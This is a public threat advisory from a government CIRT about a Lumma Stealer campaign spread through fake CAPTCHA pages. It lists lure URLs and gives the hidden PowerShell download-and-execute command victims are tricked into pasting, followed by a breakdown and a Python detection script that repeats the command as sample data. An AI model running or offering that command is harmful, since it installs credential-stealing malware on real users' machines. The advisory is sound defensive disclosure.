Emerging Threat: Stealer Malware (Lumma C2) Campaign with Fake CAPTCHA Pages

Published on 08-Oct-2024 18:28:00


TLP: CLEAR

Distribution: Public

Type of Threat: Stealer Malware (C2)

Date: 08 October 2024


Executive Summary

The Cyber Threat Intelligence (CTI) Unit at BGD e-GOV CIRT has recently identified a stealer malware campaign linked to the notorious Lumma Stealer malware family. Further investigation has revealed that multiple variants of stealer malware are being distributed using similar tactics. This report details how our threat intelligence researchers detected and analyzed this evolving malware campaign.

Our CTI Unit has been actively monitoring stealer malware campaigns and has identified evidence of malware that exfiltrates sensitive user information both locally and globally. In a recent analysis, we detected Lumma Stealer malware being propagated through deceptive CAPTCHA pages. This report illustrates how users are lured into falling victim to this novel approach of abusing CAPTCHA pages.



Fig: Global infection samples of Lumma C2 variants


Stealer Malware’s Footprint in Bangladesh



Fig: Recently detected victim samples with stealer malware in Bangladesh


Infection Chain:


Step 1: Initial Access via Malicious Hyperlinks

Several websites in Bangladesh, popular for streaming movies, have been identified as vectors for delivering malicious content to unsuspecting users. When users interact with these websites, they are presented with a convincing CAPTCHA. Upon "solving" the CAPTCHA, they are instructed to open the Windows RUN prompt and paste a suspiciously long string.

In our case, we found that the following URL was involved in these attacks as the primary web-surfing activity:

  1. https://tinyzonetv[.]stream

Clicking the above link redirects users to a CAPTCHA screen at a URL similar to the following:

https[:]//s3.ap-southeast-1.wasabisys.com/il4build/access-for-verification-page-05.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=MKL7RR2DGMIBE69KPENT%2F20241005%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T202512Z&X-Amz-Expires=43200&X-Amz-Signature=0a626639486a647545ce6cb94f7e0b7109cb6c34c7ecc9a1486a14b32a81eb9a&X-Amz-SignedHeaders=host&x-id=GetObject


When the user clicks “I’m not a robot”, the page silently generates a PowerShell command in the background, copies it to the user’s clipboard, and instructs the user to paste and run it from the RUN prompt. No download or exploit is involved at this stage; the victim is socially engineered into executing the command themselves.


Step 2: Execution of PowerShell Commands

When the user follows the instructions on the malicious page, the following PowerShell command executes on the user’s device and performs the actions described below.


powershell.exe -W Hidden -command $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text


Breakdown of the PowerShell Command:


  1. powershell.exe -W Hidden: This runs PowerShell in hidden mode, concealing the console window from the user.
  2. $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4[.]txt': A URL pointing to a remote file hosted on an external server.
  3. $response = Invoke-WebRequest -Uri $url -UseBasicParsing: This fetches the contents of the remote file using Invoke-WebRequest.
  4. $text = $response.Content: The contents retrieved from the file are stored in the variable $text.
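The breakdown above describes a download-and-execute pattern (hidden window, remote fetch, in-memory execution via iex) launched from the RUN prompt, which means explorer.exe is the parent process. The following script is an added detection example from the editor, not part of the original advisory: it scores constructed process-creation records (Sysmon Event ID 1 style, with assumed field names ParentImage and CommandLine) against those indicators so a SOC analyst can hunt for the same technique in their own telemetry.

```python
import re

# Constructed sample events. The first mirrors the one-liner from this advisory;
# the other two are benign administrative uses of PowerShell.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -W Hidden -command $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4.txt'; "
                    "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Get-ChildItem C:\\Users"},
]

# Command-line indicators; the first three correspond to steps 1-3 of the breakdown,
# with common aliases and equivalent cmdlets included so trivial rewrites still match.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("remote_fetch", re.compile(r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring", re.I)),
    ("inline_exec", re.compile(r"\biex\b|invoke-expression", re.I)),
]


def score_event(event: dict) -> dict:
    """Return the indicator names matched by one process-creation event and a verdict.

    The verdict is 'suspicious' when the command both fetches remote content and
    executes it inline; hidden window and an explorer.exe parent (the RUN dialog
    is hosted by explorer.exe) are recorded as supporting evidence.
    """
    cmd = event.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    parent = event.get("ParentImage", "").lower()
    if parent.endswith("explorer.exe") and "powershell" in cmd.lower():
        hits.append("run_dialog_parent")
    suspicious = {"remote_fetch", "inline_exec"} <= set(hits)
    return {"hits": hits, "suspicious": suspicious}


def triage(events: list) -> list:
    """Return the indices of events whose verdict is suspicious."""
    return [i for i, ev in enumerate(events) if score_event(ev)["suspicious"]]


if __name__ == "__main__":
    for idx in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {score_event(SAMPLE_EVENTS[idx])['hits']}")
```

Benign use of PowerShell from the RUN dialog only records run_dialog_parent and is not flagged; the verdict requires the fetch-and-execute pair, which is the core of this campaign's payload delivery.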


To see the full document, please click here.

